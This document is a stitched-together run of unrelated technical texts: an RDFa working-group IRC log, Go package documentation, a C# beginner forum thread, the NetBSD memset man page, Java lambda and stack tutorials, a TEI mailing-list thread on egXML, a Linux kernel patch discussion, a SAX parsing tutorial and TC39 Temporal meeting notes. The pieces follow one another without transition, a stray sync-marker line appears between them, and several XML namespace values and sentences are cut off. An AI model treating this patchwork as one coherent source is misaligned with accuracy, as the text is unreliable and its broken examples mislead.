14:49:00 <tinkster> e.g. use case a blog. blog entry titles, authors, etc are marked up in RDFa.
14:49:06 <manu>
14:49:21 <tinkster> each entry has the content as an XMLLiteral.
14:49:48 <tinkster> but perhaps the content contains data that could also be usefully exposed as RDFa...
14:50:13 <manu> Mark: I wonder whether or not we could hold off on this...
14:50:47 <manu> Mark: I thought that most of the scenarios where you'd want XMLLiterals to "store" data - most of those scenarios could be solved using CDATA or COMMENTs.
14:51:17 <manu> Mark: Perhaps we can escape the data in-line, so the RDFa parser stores it literally... if it is in "the structure" parse it as is.
14:51:51 <manu> Manu: Move discussion of this to the mailing list.
14:52:06 <manu> Topic: ISSUE-27: Relative URIs (on Shane)
14:52:47 <Steven> issue-27?
14:52:47 <trackbot> ISSUE-27 -- Does TermorCURIEorURI allow relative URIs? -- open
14:52:47 <trackbot>
14:52:58 <manu> Manu: Any arguments for/against?
14:54:13 <manu> Shane: I don't think allowing relative URIs in a datatype makes sense - it was not what we envisioned when we created datatype.
14:54:18 <markbirbeck> q+
14:54:38 <tinkster> An argument against might be future extensibility. By disallowing these now, RDFa 1.2/2.0 might like to define some kind of token which looks a bit like a relative URI.
14:54:44 <manu> Steven: I'm uncomfortable with not allowing things... what do we lose by allowing relative URIs?
14:55:00 <manu> Mark: I agree with Steven, how do we ban this? I think this was originally intended.
14:55:43 <ShaneM> q+ to argue with mark ;-)
14:55:52 <Steven> ack mark
14:55:52 <manu> Mark: It's a bit like the discussion on absolute URIs - we had issues with distinguishing with QNames - if the prefix is undefined, it's a URI.
14:55:54 <manu> ack mark
14:55:56 <Steven> ack shane
14:55:56 <Zakim> ShaneM.a, you wanted to argue with mark ;-)
14:55:56 <manu> ack shane
14:56:38 <manu> Shane: You're right, except that this means that if I use a token and it's not defined, it's a relative URI.
14:57:02 <manu> Shane: Is it relative to the current vocab URI? Or the current base?
14:58:02 <ShaneM> how does this concept work in conjunction with this resolution: RESOLVED: RDFa attributes containing all invalid values should be interpreted as those attributes with an empty attribute value. ←
14:58:09 <manu> Manu: This is like our junk triples discussion.
14:58:29 <manu> Mark: Well, they're not junk triples... they meant to create a triple, it's just the wrong one.
14:58:57 <manu> Manu: What's the use case for this?
14:59:10 <manu> Mark: If you're doing something like an OWL ontology, the predicates are the values in the ontology.
14:59:53 <manu> Mark: It's not a strong argument for it... but Steven's opening remark is fair... what do we gain by removing it?
15:00:01 <tinkster> If you're doing something like an OWL ontology, you can just set vocab="..." on your entire document anyway.
15:00:23 <tinkster> We're not "removing it" per se - they're not allowed in RDFa 1.0 anyway.
15:02:27 <manu> Manu: Sounds like we don't have a strong use case... we're not removing it, just saying it's undefined and it doesn't generate a triple.
15:03:16 <markbirbeck> q+
15:03:23 <ShaneM>
15:03:43 <manu> q+ to end telecon
15:04:24 <manu> Mark: So, basically if we "prevent" relative URIs... we have to detect them.
# SPECIAL MARKER FOR CHATSYNC. DO NOT EDIT THIS LINE OR BELOW. SRCLINESUSED=00000192
import "gopkg.in/webhelp.v1/whcompat"
Package whcompat provides webhelp compatibility across different Go releases.
The webhelp suite depends heavily on Go 1.7 style http.Request contexts, which aren't available in earlier Go releases. This package backports all of the functionality in a forwards-compatible way. You can use this package to get the desired behavior for all Go releases.
close18.go compat17.go pkg.go
CloseNotify causes a handler to have its request.Context() canceled the second the client TCP connection goes away by hooking the http.CloseNotifier logic into the context. Prior to Go 1.8, this costs an extra goroutine in a read loop. Go 1.8 and on, this behavior happens automatically with or without this wrapper.
Context is a light wrapper around the behavior of Go 1.7's (*http.Request).Context method, except this version works with earlier Go releases, too. In Go 1.7 and on, this simply calls r.Context(). See the note for WithContext for how this works on previous Go releases. If building with the appengine tag, when needed, fresh contexts will be generated with appengine.NewContext().
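A minimal usage sketch (the handler, route, and port below are illustrative, not part of the package):

	package main

	import (
		"fmt"
		"net/http"

		"gopkg.in/webhelp.v1/whcompat"
	)

	func handler(w http.ResponseWriter, r *http.Request) {
		ctx := whcompat.Context(r) // r.Context() on Go 1.7+, backported behavior otherwise
		select {
		case <-ctx.Done():
			return // request canceled or client gone
		default:
			fmt.Fprintln(w, "hello")
		}
	}

	func main() {
		http.HandleFunc("/", handler)
		http.ListenAndServe(":8080", nil)
	}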
DoneNotify cancels request contexts when the http.Handler returns in Go releases prior to Go 1.7. In Go 1.7 and forward, this is a no-op. You get this behavior for free if you use whlog.ListenAndServe.
WithContext is a light wrapper around the behavior of Go 1.7's (*http.Request).WithContext method, except this version works with earlier Go releases, too. IMPORTANT CAVEAT: to get this to work for Go 1.6 and earlier, a few tricks are pulled, such as expecting the returned r.URL to never change what object it points to, and a finalizer is set on the returned request.
Package whcompat imports 2 packages and is imported by 15 packages. Updated 2017-06-02.
Type: Posts; User: italianboy
So far I have only done the GUI; I don't know how I am going to write it!
How do I write the code for a Highscore Table that can save the name of the player in the table, using the C# language? Any hints please, help!
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
...
Can't run it, it shows an error. Do I need to add something to it?
Timer _timer1;
Error 1 'Timer' is a 'namespace' but is used like a 'type'
Yeah, I already tried many times before I posted, but I still can't manage to do it!
I know it is simple, but it's hard when it comes to the part where you write the code!
Can you give me some links I can use as a reference?
Because I...
hi,
Firstly, I click the start button, then the timer ticks and the label shows the time counted from 0s until the person solves the puzzle; then the timer stops!
How am I going to write...
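Not from the original thread, but here is a minimal sketch of one way to do it. The form and control names (PuzzleForm, btnStart, lblTime) are assumptions, and the error above usually means something else in scope (such as your project's own namespace) is called Timer, so the type is fully qualified here:

using System;
using System.Windows.Forms;

public class PuzzleForm : Form
{
    // fully qualified to avoid the "'Timer' is a 'namespace'" error
    private System.Windows.Forms.Timer _timer1 = new System.Windows.Forms.Timer();
    private Label lblTime = new Label();
    private Button btnStart = new Button();
    private int _seconds = 0;

    public PuzzleForm()
    {
        btnStart.Text = "Start";
        lblTime.Top = 40;
        _timer1.Interval = 1000; // tick once per second
        _timer1.Tick += delegate { _seconds++; lblTime.Text = _seconds + "s"; };
        btnStart.Click += delegate { _seconds = 0; _timer1.Start(); };
        Controls.Add(btnStart);
        Controls.Add(lblTime);
    }

    [STAThread]
    public static void Main()
    {
        Application.Run(new PuzzleForm());
    }
}

To stop the clock when the puzzle is solved, call _timer1.Stop() from wherever you detect the solution.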
MEMSET(3) NetBSD Library Functions Manual MEMSET(3)
NAME
memset -- write a byte to byte string
LIBRARY
Standard C Library (libc, -lc)
SYNOPSIS
#include <string.h>

void *
memset(void *b, int c, size_t len);
DESCRIPTION
The memset() function writes len bytes of value c (converted to an unsigned char) to the string b.
RETURN VALUES
The memset() function returns the original value of b.

Note that the compiler may optimize away a call to memset() if it can prove that the string will not be used by the program again, for example if it is allocated on the stack and about to go out of scope. If you want to guarantee that zeros are written to memory, for example to sanitize a buffer holding a cryptographic secret, use explicit_memset(3).
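EXAMPLES
     A minimal sketch (the function and buffer names here are illustrative,
     not part of this manual page):

	#include <string.h>

	static void
	handle_secret(void)
	{
		char key[64];

		/* ... derive and use key material in key ... */

		/* A plain memset(key, 0, sizeof(key)) here may be elided by
		 * the compiler, since key is about to go out of scope. */
		explicit_memset(key, 0, sizeof(key));
	}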
SEE ALSO
bzero(3), explicit_memset(3), swab(3)
STANDARDS
The memset() function conforms to ANSI X3.159-1989 (``ANSI C89'').

NetBSD 9.0 June 23, 2013 NetBSD 9.0
The purpose of this tutorial is to show you how to use the new lambda expressions available in JDK 8. You can download the latest
build of JDK 8 at.
We are going to start with a simple example. Anyone who has done threading in java is familiar with the Runnable interface,
which can be given to a Thread to run the code within the run method on a separate thread. Let's take a look at the old way
to do this and the new way. The first variable r1 is an instance of a Runnable interface done the old way, the second variable
r2 is how you do it with lambda expressions.
public class ThreadTest {
    public static void main(String[] args) {
        Runnable r1 = new Runnable() {
            @Override
            public void run() {
                System.out.println("Old Java Way");
            }
        };
        Runnable r2 = () -> { System.out.println("New Java Way"); };
        new Thread(r1).start();
        new Thread(r2).start();
    }
}
Notice that we take all of the boilerplate code which we write every time and get rid of it with a simple expression. In fact, the code
to start the thread could be simplified even further as:
new Thread(() -> System.out.println("New Java Way")).start();
In the next section, we will show how to use a comparator the Java 8 way.
Stack is an abstract data type.
The basic operations of a stack are:
1. Push :
Push object on top of stack.
Throw exception if stack is full.
2. Pop :
Take out(remove) object that is on top of stack .
Throw exception if stack is empty.
3. Top:
Read the object that is on top of stack.
Throw exception if stack is empty.
Now we need to implement all of these operations in Java using an Object array.
Below is my Eclipse folder structure. You may find this trivial, but I am keeping all beginners in mind, so please bear with me.
Lets define an interface for a stack:
package datastructure.stack;

public interface Stack {

    // accessor methods of the stack
    public int size();
    public boolean isEmpty();
    public Object top() throws Exception;

    // update methods of the stack
    public void push(Object element) throws Exception;
    public Object pop() throws Exception;
}
Now we need to implement this functionality, so we will implement this interface in a class called ArrayStack.java.
package datastructure.stack;

public class ArrayStack implements Stack {

    private Object stack[];
    private int capacity;
    private int currentPos = -1;

    public ArrayStack(int capacity) {
        this.capacity = capacity;
        stack = new Object[capacity];
    }

    @Override
    public int size() {
        return this.capacity;
    }

    @Override
    public boolean isEmpty() {
        return currentPos < 0;
    }

    @Override
    public Object top() throws Exception {
        if (currentPos < 0) {
            throw new Exception("Stack is Empty");
        }
        return stack[currentPos];
    }

    @Override
    public void push(Object element) throws Exception {
        if (currentPos == capacity - 1) {       // stack is full
            throw new Exception("Stack is Full");
        }
        stack[++currentPos] = element;
    }

    @Override
    public Object pop() throws Exception {
        if (currentPos < 0) {
            throw new Exception("Stack is Empty");
        }
        Object element = stack[currentPos];     // remember the top element
        stack[currentPos--] = null;             // release the slot
        return element;
    }
}
As you can see in ArrayStack.java,
we define a constructor to initialize the size of our stack. This size sets the limit on the number of elements in the stack.
So let me briefly explain the class variables and methods.
Object stack[] : An array which is going to be our stack(element holder)
int capacity : Max size of Stack
int currentPos : The pointer to the top element of the stack. We need to increment it when an element is pushed and decrement it when we do a pop operation. Initially we keep it at -1, as the first element will have index 0, so if there is no element it should be -1.
public int size() : Gives you the capacity of the stack, which was set at initialization time.
public boolean isEmpty() : Gives you true/false based on the currentPos pointer.
public Object top() : Returns the object on top of the stack without removing it. If there is no element, it throws an exception.
public void push(Object element) : Pushes the object specified as the parameter onto the stack. If the stack is full, it throws an exception.
public Object pop() : Removes and returns the element on top of the stack. If the stack is empty, it throws an exception.
So that's all, everyone. Below are some basic operations that I ran, and their output.
import datastructure.stack.ArrayStack;

public class MainPractise {

    public static void main(String[] args) {
        ArrayStack as = new ArrayStack(10); // stack can hold at most 10 elements
        try {
            System.out.println("Stack size:" + as.size());
            as.push("Nirav");                     // push a String object onto the stack
            as.pop();                             // pop Nirav out of the stack 🙁
            as.push("Nihar");
            String topString = (String) as.top(); // check out Nihar 😛
            System.out.println(topString);
            /* You will see the stubborn "Nihar" string printed out,
               but the object will still be on the stack */
            as.pop();                             // now there is no element in the stack
            as.pop();                             // throws an exception, as the stack is empty
        } catch (Exception e) {
            System.out.println("Exception message:" + e.getMessage());
        }
    }
}
The output of above code is:
Stack size:10
Nihar
Exception message:Stack is Empty
This is it.
You can get the above code from Git.
If you have any questions, mail us at
snippetexample@gmail.com, post comments, or join us on Facebook.
The TEI guidelines unambiguously state that <egXML> should be used to contain XML example fragments:
eg: Section 22.4.2 Exemplification of Components () quotes the description for <egXML>:
"egXML (example of XML) contains a single
well-formed XML fragment demonstrating the use
of some XML element or attribute, in which the
egXML element itself functions as the root
element. "
and further states explicitly that
"[a]n egXML element should not be used to tag
non-XML examples: the general purpose eg or q
elements should be used for such purposes."
Yet, <egXML> is formally specified to contain only text ():
<rng:element
<rng:ref
<rng:ref
<rng:text/>
</rng:element>
Which seems obviously wrong to me. James Cummings pointed me to a modified definition of <egXML> in tei_odds.odd:
<elementSpec module="tagdocs" ns="" usage="mwa" ident="egXML" mode="change">
<content>
<oneOrMore xmlns="">
<choice>
<text/>
<ref name="anyTEI"/>
</choice>
</oneOrMore>
</content>
</elementSpec>
Where "anyTEI" is specified as a macro listing all TEI elements. There are two problems with this definition as well:
1. all examples in the distributed TEI odd files should be properly namespaced. Instead of
<egXML xmlns="">
<p>I fully appreciate Gen. Pope's splendid
achievements with their invaluable results; but
you must know that Major Generalships in the
Regular Army, are not as plenty as blackberries.
</p>
</egXML>
it should be
<eg:egXML xmlns:
<p>I fully appreciate Gen. Pope's splendid
achievements with their invaluable results; but
you must know that Major Generalships in the
Regular Army, are not as plenty as blackberries.
</p>
</eg:egXML>
2. Even then, this content model would be too limited w.r.t. the prose description that "any well-formed XML fragment" should be allowed in <egXML>. It appears that such a general content model can be expressed in Relax NG without much problems[1].
To round up, I suggest that
1. Minimally, the general content model of <egXML> should be replaced with the adapted definition from tei_odds.odd.
2. Optimally, the general content model of <egXML> should be relaxed to allow for any XML element
3. Optionally, the examples TEI ODD files should be recoded with proper namespaces.
Ron Van den Branden
====
[1] examples of such definitions:
*
*
Lou Burnard
2008-07-19
The main use for egXML in P5 is as a means of validating the examples against the TEI example schema, which is a schema that permits any TEI element as root, but observes constraints for its children thereafter. A content model of ANY or of plain text would not give us this (very useful) degree of validation. This is why we use the definition in tei_odds rather than the "canonical" one. The latter is different because we don't assume that everyone will necessarily want to use egXML in TEI ODD documents. We chose "text" as the least annoying possible content model for people wanting to use this element to mark up examples from other XML syntaxes, fully expecting that they might want to modify it in the same way that we have for ODD purposes. I agree that ANY would have been another choice we might have made, so that egXML examples would at least be constrained to be well-formed.
I don't understand the point you are making about the namespace.
Syd Bauman
2008-07-19
Deep and impressive analysis Ron, keep up the good work! However, I
only agree with one of your three suggestions, as follows.
1. The content model from tei_odds.odd is, deliberately, *far* more
restrictive than the generic <egXML> element's content, because it
is not intended to be used for any TEI document (which might, e.g.,
be used to exemplify some non-TEI language or elements outside the
TEI namespace). The tei_odd schema is not intended for use by the
general user, but rather the user who wants to write an ODD for a
TEI customization.
2. The general content model for <egXML> always should have been
something that constrains the content to match the prose, e.g.
using the pattern 'any', declared as
any = ( element * { any* } | attribute * { text }* | text )
might do the trick. I think this is an egregious and corrigible
error, although it is a minor one.
3. AFAIK, there is no difference between
<egXML xmlns="">
and
<eg:egXML xmlns:
As far as an XML processor is concerned, those two are the same.
(The element with local-name 'egXML' from the namespace
''.) While I can see the argument
that the latter might be a little easier for humans to follow
what's going on (less likely your eye skips the detail that the
element is in a different namespace), it may turn out to be quite a
pain to maintain in the source for the Guidelines, depending on the
software used (as everytime one ran the source through a processor,
it may change it back).
Two points.
a) the reason why <egXML> does not have the generic "any XML with any attribute" pattern is because
it does not translate to DTDs. In retrospect, I now think we should have made that work as it
ought, and dumbed down the DTD to PCDATA. I propose to make that change at the next release unless
there are objections from the Council when its discussed.
b) sorry, but
<egXML xmlns="">
and
<eg:egXML xmlns:
are really not the same at all. In the first case, the namespace
is inherited by child elements, in the second case only the <egXML>
is in that example namespace.
Syd Bauman
2008-07-19
Sebastian --
(a) Excellent! Glad to hear it.
(b) Yes, indeed, you are correct of course. I should have been more precise, as in
<egXML xmlns="">
<p>Quack!</p>
</egXML>
and
<eg:egXML xmlns:
<eg:p>Quack!</eg:p>
</eg:egXML>
are the same. (Although the same applies to other descendants, too, of course.)
Just for the record, by the way, it was a conscious decision that all the
examples in the Guidelines be encoded in the Examples namespace rather
than the _real_ TEI namespace. It was (and probably still is) a controversial
decision, but the rationale was twofold:
a) otherwise, every small example
would have to have an xmlns attribute added to its root element(s), and that
this would impose a burden on editors.
b) if all the examples were actually in the TEI namespace, it would
play merry hell with processing the actual Guidelines text. XSL
constructs like <xsl:number would all have to be adjusted
to exclude anything which was a descendant of egXML. Doable, of course,
and maybe this was pusillanimity :-}
ron van den branden
2008-07-19
> Just for the record, by the way, it was a conscious decision that all the
> examples in the Guidelines be encoded in the Examples namespace rather
> than the _real_ TEI namespace. It was (and probably still is) a
> controversial decision, but the rationale was twofold:
Ah, my assumption was that <egXML> was explicitly designed to allow its contents to be validated in their own namespace (instead of the Examples namespace). That's why I thought
<p xmlns="">
<eg:egXML xmlns:
<p>Quack!
<div>This is not exactly a valid TEI example</div>
</p>
</eg:egXML>
</p>
would
a) allow the erroneous TEI content of <egXML> to be spotted at validation
b) be a way to avoid the TEI namespace declaration on any child element
But on second thought, my association between 'TEI namespacedness' and validation might be too naive? If a TEI document is validated against, say, TEI lite, will this schema association automatically apply to TEI-namespaced contents of <egXML> as well? Or am I completely missing the point?
I think you may be reading too much into this. In retrospect, I wonder
if we designed this element wrong, putting <egXML> into its own namespace,
and using that to hide the namespace of the contents.
Still, it is what it is. You can put any element in there, and adjust
the schema to validate them, and that's about as far as it goes. The
Guidelines cheat by putting fake TEI examples in there, without
explaining it well, which I confess to being ashamed of :-{
Lou Burnard
2008-08-17
Lou Burnard
2008-09-03
Sebastian Rahtz
2008-09-04
On Fri, Jan 16, 2009 at 09:45:40PM +0100, Oleg Nesterov wrote:
> Hi Louis,
>
> On 01/16, Louis Rilling wrote:
> >
> > On 16/01/09 6:55 +0100, Oleg Nesterov wrote:
> > > + struct pid_namespace *ns)
> > > {
> > > - return pid_nr_ns(task_pid(tsk), ns);
> > > + pid_t nr = 0;
> > > +
> > > + rcu_read_lock();
> > > + if (!ns)
> > > + ns = current->nsproxy->pid_ns;
> > > + if (likely(pid_alive(task))) {
> >
> > I don't see what this pid_alive() check buys you. Since tasklist_lock is not
> > enforced, nothing prevents another CPU from detaching the pid right after the
> > check.
>
> pid_alive() should be renamed. We use it to make sure the task didn't pass
> __unhash_process().
>
> Yes, you are right, nothing prevents another CPU from detaching the pid right
> after the check. But this is fine: we read ->pids[].pid under rcu_read_lock(),
> and if it is NULL pid_nr_ns() returns. So, we don't need pid_alive() check at
> all.
>
> However, we can not use task->group_leader unless we verify the task is still
> alive. That is why we need this check. We do not clear ->group_leader when
> the task exits, so we can't do
>
> rcu_read_lock();
> if (task->group_leader)
> do_something(task->group_leader);
> rcu_read_unlock();
>
> Instead we use pid_alive() before using ->group_leader.

Ok, I see now. Since RCU is locked and pid_alive(task) has been true at
some point, task->group_leader cannot be freed because release_task()
does not release task->group_leader before releasing task. IOW,
release_task() can't have started releasing task->group_leader before
rcu_read_lock().

Thank you for your explanation!

> > I'm also a bit puzzled by your description with using tasklist_lock when task !=
> > current, and not seeing tasklist_lock anywhere in the patch. Does this mean that
> > "safe" is for "no access to freed memory is done, but caller has to take
> > tasklist_lock or may get 0 as return value"?
>
> I am not sure I understand the question...
>
> This patch doesn't use tasklist, it relies on rcu. With this patch the caller
> doesn't need tasklist/rcu to call these helpers (but of course, the caller
> must ensure that task_struct is stable).
>
> But, whatever the caller does, it can get 0 as return value anyway if the
> task exists, this is correct. Or I misunderstood you?

My question was probably badly phrased. When reading the patch
description I thought that the point was to fix the helpers so that
tasklist_lock would be taken whenever task != current. Of course your
patch does not do this, and I'm perfectly fine with this.

Thanks,
Louis

--
Dr Louis Rilling - Kerlabs - IRISA
Skype: louis.rilling - Campus Universitaire de Beaulieu
Phone: (+33|0) 2 99 84 71 52 - Avenue du General Leclerc
Fax: (+33|0) 2 99 84 71 71 - 35042 Rennes CEDEX - France
The Simple API for XML (SAX) is one of the first and currently the most popular method for working with XML data. It evolved from discussions on the XML-DEV mailing list and, shepherded by David Megginson, [1] was quickly shaped into a useful specification.
[1] David Megginson maintains a web page about SAX at.

Since there's no good reason not to use SAX2, you can assume that SAX2 is what we are talking about when we say "SAX."
SAX was originally developed in Java in a package called org.xml.sax . As a consequence, most of the literature about SAX is Java-centric and assumes that is the environment you will be working in. Furthermore, there is no formal specification for SAX in any programming language but Java. Analogs in other languages exist, such as XML::SAX in Perl, but they are not bound by the official SAX description. Really they are just whatever their developer community thinks they should be.
David Megginson has made SAX public domain and has allowed anyone to use the name. An unfortunate consequence is that many implementations are really just "flavors" of SAX and do not match in every detail. This is especially true for SAX in other programming languages where the notion of strict compliance would not even make sense. This is kind of like the plethora of Unix flavors out today; they seem much alike, but have some big differences under the surface.
SAX describes a universal interface that any SAX-aware program can use, no matter where the data is coming from. Figure 10-1 shows how this works. Your program is at the right. It contacts the ParserFactory object to request a parser that will serve up a stream of SAX events. The factory finds a parser and starts it running, routing the SAX stream to your program through the interface.
The workhorse of SAX is the SAX driver. A SAX driver is any program that implements the SAX2 XMLReader interface . It may include a parser that reads XML directly, or it may just be a wrapper for another parser to adapt it to the interface. It may even be a converter, transmuting data of one kind (say, SQL queries) into XML. From your program's point of view, the source doesn't matter, because it is all packaged in the same way.
The SAX driver calls subroutines that you supply to handle various events. These call-backs fall into four categories, usually grouped into objects:
Document handler
Entity resolver
DTD handler
Error handler
To use a SAX driver, you need to create some or all of these handler classes and pass them to the driver so it can call their call-back routines. The document handler is the minimal requirement, providing methods that deal with element tags, attributes, processing instructions, and character data. The others override default behavior of the core API. To ensure that your handler classes are written correctly, the Java version of SAX includes interfaces , program constructs that describe methods to be implemented in a class.
The characters method of the content handler may be called multiple times for the same text node, as SAX drivers are allowed to split text into smaller pieces. Your code will need to anticipate this and stitch text together if necessary.
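A common workaround, sketched here rather than taken from the text (the class name is invented for illustration), is to buffer the pieces and use them only when the enclosing element ends:

import org.xml.sax.helpers.DefaultHandler;

public class TextBufferingHandler extends DefaultHandler {

    private StringBuffer text = new StringBuffer();

    public void characters (char ch[], int start, int length) {
        text.append(ch, start, length);   // may fire several times per text node
    }

    public void endElement (String uri, String name, String qName) {
        String whole = text.toString();   // the stitched-together text
        System.out.println("text: " + whole);
        text.setLength(0);                // reset for the next element
    }
}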
The entity resolver overrides the default method for resolving external entity references. Ordinarily, it is assumed that you just want all external entity references resolved automatically, and the driver tries to comply, but in some cases, entity resolution has to be handled specially. For example, a resource located in a database would require that you write a routine to extract the data, since it is an application-specific process.
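For instance, a resolver that serves a local copy of a DTD instead of fetching it over the network might look like this (the class name and file paths are invented for illustration); you would register it with the driver via setEntityResolver():

import java.io.IOException;
import org.xml.sax.EntityResolver;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class LocalDTDResolver implements EntityResolver {

    public InputSource resolveEntity (String publicId, String systemId)
            throws SAXException, IOException {
        if (systemId != null && systemId.endsWith("cereal.dtd")) {
            // serve a local copy instead of the remote resource
            return new InputSource("file:///usr/local/dtds/cereal.dtd");
        }
        return null;  // fall back to the driver's default resolution
    }
}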
The core API doesn't create events for lexical structures like CDATA sections, comments, and DOCTYPE declarations. If your environment provides the DTD handling extension, you can write a handler for that. If not, then you should just assume that the CDATA sections are treated as regular character data, comments are stripped out, and DOCTYPE declarations are out of your reach.
The error handler package gives the programmer a graceful way to deal with those unexpected nasty situations like a badly formed document or an entity that cannot be resolved. Unless you want an angry mob of users breaking down your door, you had better put in some good error checking code.
In this first example, we will use SAX to create a Java program that counts elements in a document. We start by creating a class that manages the parsing process, shown in Example 10-2.
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.XMLReaderFactory;
import org.xml.sax.InputSource;
import java.io.FileReader;

public class SAXCounter {

    public SAXCounter () {
    }

    public static void main (String args[]) throws Exception {
        XMLReader xr = XMLReaderFactory.createXMLReader();
        SAXCounterHandler h = new SAXCounterHandler();  // create a handler
        xr.setContentHandler(h);                        // register it with the driver
        FileReader r = new FileReader(args[0]);
        xr.parse(new InputSource(r));
    }
}
This class sets up the SAX environment and requests a SAX driver from the parser factory XMLReaderFactory. Then it creates a handler and registers it with the driver via the setContentHandler( ) method. Finally, it reads a file (supplied on the command line) and parses it. Because I am trying to keep this example short, I will not register an error handler, although ordinarily this would be a mistake.
The next step is to write the handler class, shown in Example 10-3.
import org.xml.sax.helpers.DefaultHandler;
import org.xml.sax.Attributes;

public class SAXCounterHandler extends DefaultHandler {

    private int elements;

    public SAXCounterHandler () {
        super();
    }

    // handle a start-of-document event
    public void startDocument () {
        System.out.println("Starting to parse...");
        elements = 0;
    }

    // handle an end-of-document event
    public void endDocument () {
        System.out.println("All done!");
        System.out.println("There were " + elements + " elements.");
    }

    // handle a start-of-element event
    public void startElement (String uri, String name, String qName, Attributes atts) {
        System.out.println("starting element (" + qName + ")");
        if ("".equals(uri))
            ;
        else
            System.out.println(" namespace: " + uri);
        System.out.println(" number of attributes: " + atts.getLength());
    }

    // handle an end-of-element event
    public void endElement (String uri, String name, String qName) {
        elements++;
        System.out.println("ending element (" + qName + ")");
    }

    // handle a characters event
    public void characters (char ch[], int start, int length) {
        System.out.println("CDATA: " + length + " characters.");
    }
}
This class implements five types of events:

startDocument
Initialize the elements counter and print a message.

endDocument
Print the number of elements counted.

startElement
Output the qualified name of the element, the namespace URI, and the number of attributes.

endElement
Increment the element counter and print a message.

characters
Print the number of characters in the text node.

Any other events are handled by the superclass DefaultHandler .
We run the program on the data in Example 10-4.
<?xml version="1.0"?>
<bcb:breakfast-cereal-box xmlns:
  <bcb:name>Sugar Froot Snaps</bcb:name>
  <bcb:graphic
  <bcb:prize>Decoder ring</bcb:prize>
</bcb:breakfast-cereal-box>
The full command is:
java -Dorg.xml.sax.driver=org.apache.xerces.parsers.SAXParser SAXCounter test.xml
The -D option sets the property org.xml.sax.driver to the Xerces parser. This is necessary because my Java environment does not have a default SAX driver. Here is the output:
Starting to parse...
starting element (bcb:breakfast-cereal-box)
 namespace:
 number of attributes: 0
CDATA: 3 characters.
starting element (bcb:name)
 namespace:
 number of attributes: 0
CDATA: 17 characters.
ending element (bcb:name)
CDATA: 3 characters.
starting element (bcb:graphic)
 namespace:
 number of attributes: 1
ending element (bcb:graphic)
CDATA: 3 characters.
starting element (bcb:prize)
 namespace:
 number of attributes: 0
CDATA: 12 characters.
ending element (bcb:prize)
CDATA: 1 characters.
ending element (bcb:breakfast-cereal-box)
All done!
There were 4 elements.
There you have it. Living up to its name, SAX is uncomplicated and wonderfully easy to use. It does not try to do too much, instead offloading the work on your handler program. It works best when the processing of a document follows the order of elements, and only one pass through it is sufficient. One common task by event processors is to assemble tree structures, which brings us to the next topic, the tree processing API known as DOM.
2018-07-26

Maggie Pint (MPT), Timothy Gu (TGU), Sebastian Markbage (SME), Dustin Savery (DSY), Mike Murry (MMY), John David Dalton (JDD), Alex Vincent (AVT), Nathan Hammond (NHD)
Agenda
Temporal Proposal update
(Maggie Pint, MPT)
MPT: JavaScript only supports two time formats, local and UTC, and this is not very ergonomic; this was part of the motivation for "civil" datetimes. Technically, the spec text and submission fall under the requirements of Stage 2 advancement, so I am requesting that. (Reads slides describing differences between civil datetimes and instants). For parsing timezones, the ISO standard does not specify the timezone (just offsets), but there is a big need for this in JavaScript. For the
plus method, we take an object with desired units and apply them in descending order of size. This is open to discussion, since you could have scenarios like 2/29/2016 plus 1 year and 2 months giving you either 4/28/2017 or 4/29/2017. You can also imagine these situations happening on days that aren't precisely 24 hours long (consider shifts for Daylight Saving Time).
JHD: For this plus issue, if you pick one of the two behaviors, can you build one off the other? In other words, you could build the rounding-down behavior out of two operations, but if you do the rounding at the beginning you may never be able to achieve that same result (so I would prefer the rounding behavior at the end).
MPT: I have to check, but I think there's a workaround if you do carry it, but I think it's hard to get the same workaround if you don't carry it.
JHD: If that's true, I would lean towards the option that allows you to achieve both behaviors (even if it requires multiple operations).
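A sketch of the two orderings from the slide example (the constructor and method names follow the proposal drafts of the time and are not final):

const d = new CivilDate(2016, 2, 29);  // a leap day
d.plus({ years: 1, months: 2 });
// years first:  2016-02-29 -> 2017-02-28 (clamped) -> 2017-04-28
// months first: 2016-02-29 -> 2016-04-29 -> 2017-04-29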
MPT: To achieve comparisons, for CivilDate/Time/DateTime/Instant we can convert to an integer value of that unit since the Unix epoch, just as we do for Dates today. How should we compare ZonedInstant
valueOfs? Do we also convert these to? Should two ZonedInstants with different timezones be equivalent (
===)?
JKN: Why nanoseconds instead of milliseconds as we do for Date?
MPT: There's a lot of demand for increased precision. Since BigInt is now available, it's not difficult for us to achieve this precision.
If we were to depart from InstantTypes and
MM: Clarity and avoiding misunderstanding is the best way to go. And I think ZonedInstant is the best one.
MPT: Thanks, and I would love more feedback on this. And there are more controversies, like the strong camp that wants to call these types
local, to match Java, to mean zoneless.
MM: I agree that local is a disaster.
AW: Maybe "Simple"?
MPT: Elixir uses "Naive", but that's a bit controversial too. I like Simple, but again we're really not sure yet. Another controversy is whether this should be a new global called
Temporal, or a built-in module.
SCR: I was wondering how this interops with Intl.DateTimeFormat, etc. I would like to see any APIs that generate DateStrings be Intl-first. Where is toLocaleString?
MPT: Sort of by definition this would have to be a separate proposal.
WH: Currently you ignore leap seconds, requiring smearing them away. How will you work with operating systems, like upcoming Windows for example, which support leap seconds and in fact forbid smearing leap seconds?
MPT: Unfortunately, leap seconds are not included in Unix time and never will be. The problem with leap seconds is we actually have to store a table with all the leap seconds.
WH: I understand that you can't really predict them until they happen. But unfortunately, upcoming regulations require leap second support and forbid smearing to achieve it, so we should be compliant. I've read Microsoft's paper on why and how they will implement them in Windows.
MPT: If we go with the valueOf implementation, this will break with leap seconds.
MPT: Leap seconds are my least-favorite part of working with time.
WH: Mine too. I'm curious how everyone else will deal with them. Microsoft's paper on leap second support doesn't include the API they'll provide.
API: Someone brought up this issue in the tracker. Unfortunately, there is no way in ECMA-262 to distribute data about dates.
MPT: Has anyone at CLDR looked at it?
API: Yeah, they have, but unfortunately this process requires a lot of time. Browsers need to ship updates, etc. It could be long enough of a delay that it's too late before the leap second actually happens.
API: I had a question on valueOf. For time, seconds since midnight makes sense. Instead of days since epoch, milliseconds might be better, so that you can compare a CivilDate to DateTime.
MPT: Now you're implying that there's a corollary between Dates and DateTimes.
API: I'm in the camp that ZonedInstants should not compare. The programmer should say what they mean. If they want to compare two ZonedInstants, they should convert to UTC, for example.
AWB: You mentioned conversion to and from strings. I want to understand the format you're using to toISOString (formatting and parsing).
MPT: So, I think you're talking about the subset that we currently support.
AWB: I think you need to be explicit.
